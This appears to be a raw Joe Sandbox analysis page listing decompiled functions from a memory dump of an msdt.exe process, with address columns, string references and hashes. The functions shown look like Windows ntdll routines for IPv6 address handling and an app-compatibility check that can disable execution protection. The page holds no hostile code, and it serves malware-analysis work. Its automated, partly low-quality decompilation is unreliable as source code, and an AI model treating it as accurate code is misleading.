                                                                            0x026188ce
                                                                            0x026188e0
                                                                            0x026188e5
                                                                            0x026188e8
                                                                            0x026188e8
                                                                            0x026188ee
                                                                            0x02618900
                                                                            0x02618900
                                                                            0x02618905
                                                                            0x00000000
                                                                            0x02618905

                                                                            APIs
                                                                            Strings
                                                                            • Kernel-MUI-Language-Disallowed, xrefs: 02618914
                                                                            • Kernel-MUI-Language-Allowed, xrefs: 02618827
                                                                            • Kernel-MUI-Number-Allowed, xrefs: 026187E6
                                                                            • WindowsExcludedProcs, xrefs: 026187C1
                                                                            • Kernel-MUI-Language-SKU, xrefs: 026189FC
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: _wcspbrk
                                                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                            • API String ID: 402402107-258546922
                                                                            • Opcode ID: c7ea93990968357aa3ef4bd8f47ae2ee38dbb262f5097eebc487113e581135f6
                                                                            • Instruction ID: fa7059111cd61a766cebb8f265c1f7bc8e023bbaff260190ff81d46c95e4e26a
                                                                            • Opcode Fuzzy Hash: c7ea93990968357aa3ef4bd8f47ae2ee38dbb262f5097eebc487113e581135f6
                                                                            • Instruction Fuzzy Hash: 41F106B2D00209EFDF51DF98C9859EEB7B9FF08304F18446AE605A7220E735AA45DF64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 026313CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 38%
                                                                            			E026313CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E02627707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x25f2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E02627707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x25f9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E02627707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E02627707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E02627707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E02627707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                                            0x026313d5
                                                                            0x026313d9
                                                                            0x026313dc
                                                                            0x026313de
                                                                            0x026313e1
                                                                            0x026313e8
                                                                            0x026313ee
                                                                            0x0265e8fd
                                                                            0x00000000
                                                                            0x0265e921
                                                                            0x0265e921
                                                                            0x0265e928
                                                                            0x0265e982
                                                                            0x0265e98a
                                                                            0x00000000
                                                                            0x0265e99a
                                                                            0x0265e99e
                                                                            0x0265e9a3
                                                                            0x0265e9a8
                                                                            0x0265e9b9
                                                                            0x0265e978
                                                                            0x00000000
                                                                            0x0265e978
                                                                            0x0265e98a
                                                                            0x0265e92a
                                                                            0x0265e931
                                                                            0x0265e944
                                                                            0x0265e944
                                                                            0x0265e950
                                                                            0x0265e954
                                                                            0x0265e959
                                                                            0x0265e95e
                                                                            0x0265e963
                                                                            0x0265e970
                                                                            0x00000000
                                                                            0x0265e975
                                                                            0x0265e93b
                                                                            0x0265e980
                                                                            0x00000000
                                                                            0x0265e980
                                                                            0x0265e942
                                                                            0x0265e94b
                                                                            0x00000000
                                                                            0x0265e94b
                                                                            0x00000000
                                                                            0x0265e942
                                                                            0x026313f4
                                                                            0x026313f4
                                                                            0x026313f9
                                                                            0x026313fc
                                                                            0x026313ff
                                                                            0x02631406
                                                                            0x0265e9cc
                                                                            0x0265e9d2
                                                                            0x0265e9d2
                                                                            0x0265e9cc
                                                                            0x0263140c
                                                                            0x02631411
                                                                            0x02631431
                                                                            0x0263143a
                                                                            0x0263143c
                                                                            0x0263143f
                                                                            0x0263143f
                                                                            0x02631442
                                                                            0x02631447
                                                                            0x026314a8
                                                                            0x026314ac
                                                                            0x0265e9e2
                                                                            0x0265e9e7
                                                                            0x0265e9ec
                                                                            0x0265ea05
                                                                            0x0265ea05
                                                                            0x00000000
                                                                            0x02631449
                                                                            0x00000000
                                                                            0x02631449
                                                                            0x0263144c
                                                                            0x02631459
                                                                            0x02631462
                                                                            0x02631469
                                                                            0x0263146a
                                                                            0x02631470
                                                                            0x02631473
                                                                            0x02631476
                                                                            0x02631476
                                                                            0x02631490
                                                                            0x02631495
                                                                            0x0263138e
                                                                            0x02631390
                                                                            0x02631397
                                                                            0x02631398
                                                                            0x02631399
                                                                            0x026313a1
                                                                            0x026313a4
                                                                            0x026313a4
                                                                            0x02631498
                                                                            0x0263149c
                                                                            0x0263149f
                                                                            0x026314a2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x026314a4
                                                                            0x00000000
                                                                            0x026314a4
                                                                            0x02631413
                                                                            0x02631415
                                                                            0x02631416
                                                                            0x02631419
                                                                            0x0263141c
                                                                            0x02631422
                                                                            0x026313b7
                                                                            0x026313bc
                                                                            0x026313bf
                                                                            0x026313bf
                                                                            0x026313c2
                                                                            0x02631424
                                                                            0x02631424
                                                                            0x02631424
                                                                            0x02631427
                                                                            0x0263142b
                                                                            0x0263142c
                                                                            0x0263142c
                                                                            0x0263142c
                                                                            0x00000000
                                                                            0x0263141c
                                                                            0x02631411

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: 99cecb57b4ca50eddee497d907828ee65808e89d734c997ff2f2ade7be5f97a8
                                                                            • Instruction ID: 2e2c887f3e5fb9216a6b74a31a15503f8de012f9a92f64c750e30199a8114fe7
                                                                            • Opcode Fuzzy Hash: 99cecb57b4ca50eddee497d907828ee65808e89d734c997ff2f2ade7be5f97a8
                                                                            • Instruction Fuzzy Hash: F66139B1D04A55AADF2ACF59C8809BFBBF5EF85310B14C06DE9EA47641D335A740CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02627EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 64%
                                                                            			E02627EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x26d2088; // 0x7632310a
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E02627F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E02643F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E025FDFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x26d4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E02643F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E02600D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E02643F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E02608375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E02643F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0266E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E02643F92();
					_t38 = 1;
					L2:
					return E025FE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                                            0x02627f08
                                                                            0x02627f0f
                                                                            0x02627f12
                                                                            0x02627f1b
                                                                            0x02627f31
                                                                            0x02643ead
                                                                            0x02643eb4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02643eba
                                                                            0x02643ecd
                                                                            0x02643ed2
                                                                            0x02643ee1
                                                                            0x02643ee7
                                                                            0x02643eec
                                                                            0x02643f12
                                                                            0x02643f18
                                                                            0x02643f1a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02643f20
                                                                            0x02643f26
                                                                            0x02643f28
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02643f2e
                                                                            0x02643f30
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02643f3a
                                                                            0x02643f3b
                                                                            0x02643f53
                                                                            0x02643f64
                                                                            0x02643f69
                                                                            0x02643f6c
                                                                            0x02643f6d
                                                                            0x02643f6f
                                                                            0x0264e304
                                                                            0x0264e30f
                                                                            0x0264e315
                                                                            0x0264e31e
                                                                            0x0264e321
                                                                            0x0264e327
                                                                            0x0264e329
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0264e32f
                                                                            0x0264e32f
                                                                            0x0264e337
                                                                            0x0264e33a
                                                                            0x0264e33b
                                                                            0x0264e33d
                                                                            0x0264e33f
                                                                            0x0264e341
                                                                            0x0264e341
                                                                            0x0264e34e
                                                                            0x0264e353
                                                                            0x0264e358
                                                                            0x0264e35d
                                                                            0x0264e35f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0264e365
                                                                            0x0264e365
                                                                            0x0264e368
                                                                            0x0264e36e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0264e374
                                                                            0x0264e32f
                                                                            0x02643f75
                                                                            0x02643f7a
                                                                            0x02643f7c
                                                                            0x02643f7e
                                                                            0x02643f86
                                                                            0x02627f39
                                                                            0x02627f47
                                                                            0x02627f47
                                                                            0x02627f37
                                                                            0x02627f37
                                                                            0x00000000

                                                                            APIs
                                                                            • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02643F12
                                                                            Strings
                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 0264E345
                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02643F4A
                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0264E2FB
                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02643EC4
                                                                            • ExecuteOptions, xrefs: 02643F04
                                                                            • Execute=1, xrefs: 02643F5E
                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02643F75
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: BaseDataModuleQuery
                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                            • API String ID: 3901378454-484625025
                                                                            • Opcode ID: 9c555b24a649b8e148ca3daaa4a18db1956c64d2f80cff0c095e092e200b6796
                                                                            • Instruction ID: be2327d49123d4726f1a8d1079ce55ebab5b4a323f92c87e511e303e42917044
                                                                            • Opcode Fuzzy Hash: 9c555b24a649b8e148ca3daaa4a18db1956c64d2f80cff0c095e092e200b6796
                                                                            • Instruction Fuzzy Hash: E3411871A8071DBAEB21DE94DCC5FEBB3BDAF14704F0005A9A605E6180EB709A458FA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02630B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E02630B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E02608980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E025FDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E02630CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E02630CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E026306BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E026306BA(_t135, _t178) == 0 || E02630A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E02630CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E02630CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E026306BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E026306BA(_t124, _t142) == 0 || E02630A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                                            0x02630b21
                                                                            0x02630b24
                                                                            0x02630b27
                                                                            0x02630b2a
                                                                            0x02630b2d
                                                                            0x02630b30
                                                                            0x02630b33
                                                                            0x02630b36
                                                                            0x02630b39
                                                                            0x02630b3e
                                                                            0x02630c65
                                                                            0x02630c68
                                                                            0x02630c6a
                                                                            0x02630c6f
                                                                            0x0265eb42
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0265eb48
                                                                            0x0265eb48
                                                                            0x02630c75
                                                                            0x02630c7a
                                                                            0x0265eb54
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0265eb5a
                                                                            0x02630c80
                                                                            0x02630c84
                                                                            0x0265eb98
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0265eba6
                                                                            0x02630cb8
                                                                            0x02630cba
                                                                            0x02630cd3
                                                                            0x02630cda
                                                                            0x02630ce4
                                                                            0x02630ce9
                                                                            0x00000000
                                                                            0x02630cec
                                                                            0x02630c8c
                                                                            0x0265eb63
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0265eb70
                                                                            0x0265eb75
                                                                            0x0265eb7d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0265eb8c
                                                                            0x00000000
                                                                            0x0265eb8c
                                                                            0x02630c96
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02630ca2
                                                                            0x02630cac
                                                                            0x02630cb4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02630b44
                                                                            0x02630b47
                                                                            0x02630b49
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02630b4f
                                                                            0x02630b50
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02630b56
                                                                            0x02630b62
                                                                            0x02630b7c
                                                                            0x02630bac
                                                                            0x02630a0f
                                                                            0x0265eaaa
                                                                            0x00000000
                                                                            0x0265eac4
                                                                            0x0265eac4
                                                                            0x02630bd0
                                                                            0x02630bd0
                                                                            0x02630bd4
                                                                            0x02630bd9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02630bdb
                                                                            0x02630be0
                                                                            0x0265eb0e
                                                                            0x02630a1a
                                                                            0x00000000
                                                                            0x02630a1a
                                                                            0x0265eb1a
                                                                            0x0265eb1f
                                                                            0x0265eb27
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0265eb36
                                                                            0x00000000
                                                                            0x0265eb36
                                                                            0x02630bea
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02630bf6
                                                                            0x02630c00
                                                                            0x02630c03
                                                                            0x02630c0b
                                                                            0x00000000
                                                                            0x02630c0b
                                                                            0x0265eaaa
                                                                            0x00000000
                                                                            0x02630a15
                                                                            0x02630bb6
                                                                            0x00000000
                                                                            0x02630bc6
                                                                            0x02630bc6
                                                                            0x02630bcb
                                                                            0x02630c15
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02630c1d
                                                                            0x02630c20
                                                                            0x02630c21
                                                                            0x02630c24
                                                                            0x02630c24
                                                                            0x02630c26
                                                                            0x00000000
                                                                            0x02630c26
                                                                            0x02630bcd
                                                                            0x00000000
                                                                            0x02630bcd
                                                                            0x02630b89
                                                                            0x02630b89
                                                                            0x02630b90
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02630b96
                                                                            0x00000000
                                                                            0x02630b96
                                                                            0x02630a04
                                                                            0x02630a04
                                                                            0x02630b9a
                                                                            0x02630b9a
                                                                            0x02630b9b
                                                                            0x02630b9f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02630ba5
                                                                            0x02630ac7
                                                                            0x02630aca
                                                                            0x0265eacf
                                                                            0x00000000
                                                                            0x0265eade
                                                                            0x0265eade
                                                                            0x0265eae3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0265eaf3
                                                                            0x0265eaf6
                                                                            0x0265eaf7
                                                                            0x0265eafe
                                                                            0x0265eb01
                                                                            0x00000000
                                                                            0x0265eb01
                                                                            0x0265eacf
                                                                            0x02630ad0
                                                                            0x02630ad4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02630ada
                                                                            0x02630ae6
                                                                            0x02630c34
                                                                            0x00000000
                                                                            0x02630c47
                                                                            0x02630c49
                                                                            0x02630c4a
                                                                            0x02630c4e
                                                                            0x02630c51
                                                                            0x02630c54
                                                                            0x02630c57
                                                                            0x02630c5a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02630c60
                                                                            0x02630afb
                                                                            0x02630afe
                                                                            0x02630b02
                                                                            0x02630b05
                                                                            0x02630b08
                                                                            0x00000000
                                                                            0x02630b08
                                                                            0x02630ae6
                                                                            0x02630b44
                                                                            0x026309f8
                                                                            0x026309f8
                                                                            0x026309f9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0265eaa0
                                                                            0x00000000

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp Download File
